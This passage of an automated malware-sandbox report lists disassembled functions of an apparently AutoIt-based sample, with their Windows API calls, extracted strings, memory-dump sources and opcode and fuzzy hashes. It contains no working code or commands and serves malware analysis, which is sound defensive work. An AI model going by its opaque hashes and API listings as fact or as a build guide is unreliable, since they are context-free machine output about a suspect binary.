                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 2179348866-1459072770
                                                    • Opcode ID: 015749b6505f796c100aec717197e46f3b8fd8db5c40425466eb4ee7c423ce45
                                                    • Instruction ID: 0f3f445ca78eeb9be076bc66e43c0089ead06f5e1dd09b2bafd85e3feb8bfa1c
                                                    • Opcode Fuzzy Hash: 015749b6505f796c100aec717197e46f3b8fd8db5c40425466eb4ee7c423ce45
                                                    • Instruction Fuzzy Hash: 194149766041A47AE702B771AC47EBF776CDF81710F100267F505BA1C2EB39AA0196BD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042DE85, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 185timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 0042DF47
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0042DF57
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0042DF63
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0042E000
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E014
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E046
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E067
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0042E0B2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                    • String ID: *.*
                                                    • API String ID: 1464919966-438819550
                                                    • Opcode ID: 75fbda7633da35370f2683487238c5a6c30111f25ab36646ade24028440a649e
                                                    • Instruction ID: 898f6dd12355a8c92e5c1109672e9246cda5870ae7563599a115303cd694de5b
                                                    • Opcode Fuzzy Hash: 75fbda7633da35370f2683487238c5a6c30111f25ab36646ade24028440a649e
                                                    • Instruction Fuzzy Hash: B86178766042259FCB10EF21D844AAFB3E8FF89310F45892EF989CB251DB35E905CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042AB12, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,0044F910), ref: 0042AB76
                                                    • GetDriveTypeW.KERNEL32(00000061,0047A620,00000061), ref: 0042AC40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: BuffCharDriveLowerType
                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 2426244813-1000479233
                                                    • Opcode ID: 62646a39ba83b17db5acc8ade4838e86358707dc65b62207854c34dc82574b27
                                                    • Instruction ID: f2c9b0fcc10dc55151d8a239130a7537f89e3555369acfd8bc7691591ebcf891
                                                    • Opcode Fuzzy Hash: 62646a39ba83b17db5acc8ade4838e86358707dc65b62207854c34dc82574b27
                                                    • Instruction Fuzzy Hash: E051B0302083119BC715EF15D881EAFB7A5EF80304F50882EF9859B2A2DB75ED59CB57
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00435A45, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00435AA6
                                                    • inet_addr.WSOCK32(?,?,?), ref: 00435AEB
                                                    • gethostbyname.WSOCK32(?), ref: 00435AF7
                                                    • IcmpCreateFile.IPHLPAPI ref: 00435B05
                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00435B75
                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00435B8B
                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00435C00
                                                    • WSACleanup.WSOCK32 ref: 00435C06
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                    • String ID: Ping
                                                    • API String ID: 1028309954-2246546115
                                                    • Opcode ID: b5e6992ab0a5c151db848b8dcd552bf22239f6a4833fc43e13bf830c4ec3f3c6
                                                    • Instruction ID: ed5a7f46930c784aa7bf24870622b07aeaaef57b1195b999ba7854716df82aaf
                                                    • Opcode Fuzzy Hash: b5e6992ab0a5c151db848b8dcd552bf22239f6a4833fc43e13bf830c4ec3f3c6
                                                    • Instruction Fuzzy Hash: 8E51AF316047009FD711AF24CC49F2ABBE4EF49710F04992AF95ADB2A1DB78EC44CB4A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042A0B5, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 161COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0042A0FC
                                                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 0042A11E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: LoadString
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%E
                                                    • API String ID: 2948472770-1668631458
                                                    • Opcode ID: d93ae49f1e77443eab40fa3a2cc83ce6bf37ee5b6bdc625cf6a71f3981b1fccb
                                                    • Instruction ID: 48c221de910c499fa0f47e30eb580da3ff938b22c98b0bb4bc1cd1bb406e30ea
                                                    • Opcode Fuzzy Hash: d93ae49f1e77443eab40fa3a2cc83ce6bf37ee5b6bdc625cf6a71f3981b1fccb
                                                    • Instruction Fuzzy Hash: A0519132900119ABCB16EBE0DD86EEEB779AF04300F5041AAF805B61A1DB352F59DF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00429EA3, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 154COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00429EEA
                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00429F0B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: LoadString
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 2948472770-3080491070
                                                    • Opcode ID: 3c1d49200c68683b4f375ada152cbd9f44c2084b3607a6ca7cc6f4e9d067e3be
                                                    • Instruction ID: be08870296b839efdb8e15a65684476e1b027240a666a11142d190cd9ffc229f
                                                    • Opcode Fuzzy Hash: 3c1d49200c68683b4f375ada152cbd9f44c2084b3607a6ca7cc6f4e9d067e3be
                                                    • Instruction Fuzzy Hash: 29518272904119AACB16EBE0DD86EEEB778EF04300F6001AAF905B6091DB352F59DF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042B72E, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0042B73B
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0042B7B1
                                                    • GetLastError.KERNEL32 ref: 0042B7BB
                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0042B828
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                    • API String ID: 4194297153-14809454
                                                    • Opcode ID: e61f73d39fc511e27e58df8fc629610bed360b5ea2e60969ab91383ab68192b1
                                                    • Instruction ID: cdc59447b60e1c575710bd551bb1e91de7705786ae5964a6029e63aea05d33fd
                                                    • Opcode Fuzzy Hash: e61f73d39fc511e27e58df8fc629610bed360b5ea2e60969ab91383ab68192b1
                                                    • Instruction Fuzzy Hash: 4F319E35A002149FCB01EF64EC85BAEB7B8EF85700F54802BE405DB291DB799D42CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00419471, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 86windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041B0C4: GetClassNameW.USER32 ref: 0041B0E7
                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 004194F6
                                                    • GetDlgCtrlID.USER32 ref: 00419501
                                                    • GetParent.USER32 ref: 0041951D
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00419520
                                                    • GetDlgCtrlID.USER32(?), ref: 00419529
                                                    • GetParent.USER32(?), ref: 00419545
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00419548
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 2573188126-1403004172
                                                    • Opcode ID: 887bb7f4c2dd964ed064132b1fc14eef2f4b37484136ae02a72df581c3ac8252
                                                    • Instruction ID: 1ccdda22104a475c348b8d764af0502ee82ac343a7488fc86ac7e19c3d75f0b7
                                                    • Opcode Fuzzy Hash: 887bb7f4c2dd964ed064132b1fc14eef2f4b37484136ae02a72df581c3ac8252
                                                    • Instruction Fuzzy Hash: E021F475A01204BFDF01ABA0CC85EFE7B78EF4A310F10412AF521971A1DB795D59DB24
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041955C, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 86windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041B0C4: GetClassNameW.USER32 ref: 0041B0E7
                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004195DF
                                                    • GetDlgCtrlID.USER32(?), ref: 004195EA
                                                    • GetParent.USER32(?), ref: 00419606
                                                    • SendMessageW.USER32(00000000,?,ListBox,?), ref: 00419609
                                                    • GetDlgCtrlID.USER32(?), ref: 00419612
                                                    • GetParent.USER32(?), ref: 0041962E
                                                    • SendMessageW.USER32(00000000,?,?,ListBox), ref: 00419631
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 2573188126-1403004172
                                                    • Opcode ID: 7cb0cbeae3a3537e00735784965efec8967afc1e8a03e96a642d1e157f9e2059
                                                    • Instruction ID: efe4c2796a372e89b626732c915c622bcf7e514bc9ec1184c6e079076d4947c4
                                                    • Opcode Fuzzy Hash: 7cb0cbeae3a3537e00735784965efec8967afc1e8a03e96a642d1e157f9e2059
                                                    • Instruction Fuzzy Hash: 0321C175A01104BFDF01ABA0CC85EFE7B78EB49300F11402AF511971A1DB79595A9B24
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00422A16, Relevance: 15.2, APIs: 10, Instructions: 196windowsleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(00486890,000000FF,00000000,00000030), ref: 00422A92
                                                    • SetMenuItemInfoW.USER32 ref: 00422AC8
                                                    • Sleep.KERNEL32(000001F4), ref: 00422ADA
                                                    • GetMenuItemCount.USER32 ref: 00422B1E
                                                    • GetMenuItemID.USER32(?,00000000), ref: 00422B3A
                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00422B64
                                                    • GetMenuItemID.USER32(?,?), ref: 00422BA9
                                                    • CheckMenuRadioItem.USER32 ref: 00422BEF
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00422C03
                                                    • SetMenuItemInfoW.USER32 ref: 00422C24
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                    • String ID:
                                                    • API String ID: 1460738036-0
                                                    • Opcode ID: 0496c70ea11079e01de56fada43eaeb98e4b84f9d2cb5ce236c6c1116f38bea8
                                                    • Instruction ID: 2f34ad5504a0147fde3f4d59752fe5582838e3da99837610e1639adebd929eaf
                                                    • Opcode Fuzzy Hash: 0496c70ea11079e01de56fada43eaeb98e4b84f9d2cb5ce236c6c1116f38bea8
                                                    • Instruction Fuzzy Hash: B361CFB0A00259BFDB20CF64EE88DEFBBB8EB01304F54046AF44197251D7B9AD05DB29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00447192, Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,?,?), ref: 00447214
                                                    • SendMessageW.USER32(00000000,?,0000101F,?), ref: 00447217
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044723B
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0044725E
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004472D6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow
                                                    • String ID:
                                                    • API String ID: 312131281-0
                                                    • Opcode ID: f59675cda4463b7debed4265911043f202686d304aaacbe1341c6c1fc3292323
                                                    • Instruction ID: 1740b61148ca98974ee3419f82ea85d22f6dd9b3f4814cc7a1e194f57393857a
                                                    • Opcode Fuzzy Hash: f59675cda4463b7debed4265911043f202686d304aaacbe1341c6c1fc3292323
                                                    • Instruction Fuzzy Hash: C6617C75900208AFEB10DFA4CC81EEE77B8EB09714F14415AFA14A73A1C775AE46DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004216DE, Relevance: 15.1, APIs: 10, Instructions: 92threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00421700
                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,00420778,?,00000001,?,?), ref: 00421714
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0042171B
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,00420778,?,00000001,?,?), ref: 0042172A
                                                    • GetWindowThreadProcessId.USER32(00000002,00000000), ref: 0042173C
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,00420778,?,00000001,?,?), ref: 00421755
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,00420778,?,00000001,?,?), ref: 00421767
                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,00420778,?,00000001,?,?), ref: 004217AC
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,00420778,?,00000001,?,?), ref: 004217C1
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,00420778,?,00000001,?,?), ref: 004217CC
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                    • String ID:
                                                    • API String ID: 2156557900-0
                                                    • Opcode ID: f59e9241280b68cbbe5137bc057916d29ae7a7fae66d1b3c599c9e76e80baf20
                                                    • Instruction ID: 8d09580b98f212f95f6e286dfe83d2cecc85e09ad24f4ac0b571e7d67cdc306e
                                                    • Opcode Fuzzy Hash: f59e9241280b68cbbe5137bc057916d29ae7a7fae66d1b3c599c9e76e80baf20
                                                    • Instruction Fuzzy Hash: FD31A275604214BBEB11AF51EC84FBE3BE9EBA6711F61403AF700862B0C7789945CB6C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003FBFF2, Relevance: 15.1, APIs: 10, Instructions: 63windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 003C2231
                                                    • SetTextColor.GDI32(?,000000FF), ref: 003C223B
                                                    • SetBkMode.GDI32(?,00000001), ref: 003C2250
                                                    • GetStockObject.GDI32(00000005), ref: 003C2258
                                                    • GetClientRect.USER32 ref: 003FC00B
                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 003FC022
                                                    • GetWindowDC.USER32(?), ref: 003FC02E
                                                    • GetPixel.GDI32(00000000,?,?), ref: 003FC03D
                                                    • ReleaseDC.USER32 ref: 003FC04F
                                                    • GetSysColor.USER32(00000005), ref: 003FC06D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                    • String ID:
                                                    • API String ID: 3430376129-0
                                                    • Opcode ID: 8f7f2b4f5cdea1131f510da81d40b84e4bdd217f1abda9bbcf5a602dd2f9caee
                                                    • Instruction ID: 59fca6c84dce00c645e5c18215839f6f316c27e37655c793fb26abae84e73f28
                                                    • Opcode Fuzzy Hash: 8f7f2b4f5cdea1131f510da81d40b84e4bdd217f1abda9bbcf5a602dd2f9caee
                                                    • Instruction Fuzzy Hash: A7215C36140204FFEB626FA4EC08FEA7B79EB06322F114275FA65940E2CB714946DF11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041A693, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 247COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                    • API String ID: 3555792229-1603158881
                                                    • Opcode ID: b32701bdcffbc38a5e5aacc71e9a627d04642e96d3a5ca7a6d28ead1cd54613b
                                                    • Instruction ID: 75678b6124e04ba924e075fa6391c336794094e0e28bb16c77d7cadc2859d00f
                                                    • Opcode Fuzzy Hash: b32701bdcffbc38a5e5aacc71e9a627d04642e96d3a5ca7a6d28ead1cd54613b
                                                    • Instruction Fuzzy Hash: 9991C670501146EADB09EF60C881BEAFB74FF04314F10861BE499A7291DF346EEACB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042DB04, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0042DCBA
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042DCCE
                                                    • GetFileAttributesW.KERNEL32(?), ref: 0042DCE6
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0042DD00
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042DD12
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile
                                                    • String ID: *.*
                                                    • API String ID: 769691225-438819550
                                                    • Opcode ID: 316f708a2f09b33b67158b70da7fdfbfb3e8911986a955f3c713d434e8ee996f
                                                    • Instruction ID: effe7d7834268457010006fce9a229aaf1b755f444d64596a09a1ad8ee85ef69
                                                    • Opcode Fuzzy Hash: 316f708a2f09b33b67158b70da7fdfbfb3e8911986a955f3c713d434e8ee996f
                                                    • Instruction Fuzzy Hash: 1381B471A042509FCB24DF24D8559ABB7E8BB88310F95882FF889CB350E778ED45CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C2E26, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowLongW.USER32 ref: 003C2EAE
                                                    • GetDC.USER32 ref: 003FCF82
                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003FCF95
                                                    • SelectObject.GDI32(00000000,00000000), ref: 003FCFA3
                                                    • SelectObject.GDI32(00000000,00000000), ref: 003FCFB8
                                                    • ReleaseDC.USER32 ref: 003FCFC0
                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003FD04B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ObjectSelectWindow$LongMessageMoveReleaseSend
                                                    • String ID: U
                                                    • API String ID: 1056245551-3372436214
                                                    • Opcode ID: 3bb5c32cd6fb2dc5f924f32ca683c0d9fab024af816fffe0a1f517e26bf38675
                                                    • Instruction ID: a64f8c6b129a115e848d5557e56cdcdf0a8f813387be98efe50343010e7cbc3d
                                                    • Opcode Fuzzy Hash: 3bb5c32cd6fb2dc5f924f32ca683c0d9fab024af816fffe0a1f517e26bf38675
                                                    • Instruction Fuzzy Hash: A971A231400209EFCF229F64C984EFA7BBAFF49354F15426AFA55AA166C7319C41DB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003EA408, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 157fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,004843BA,00000104,?,00000001,00000000), ref: 003EA49A
                                                    • GetStdHandle.KERNEL32(000000F4,?,00000001,00000000), ref: 003EA554
                                                    • _strlen.LIBCMT ref: 003EA594
                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,?,?,00000001,00000000), ref: 003EA5A3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
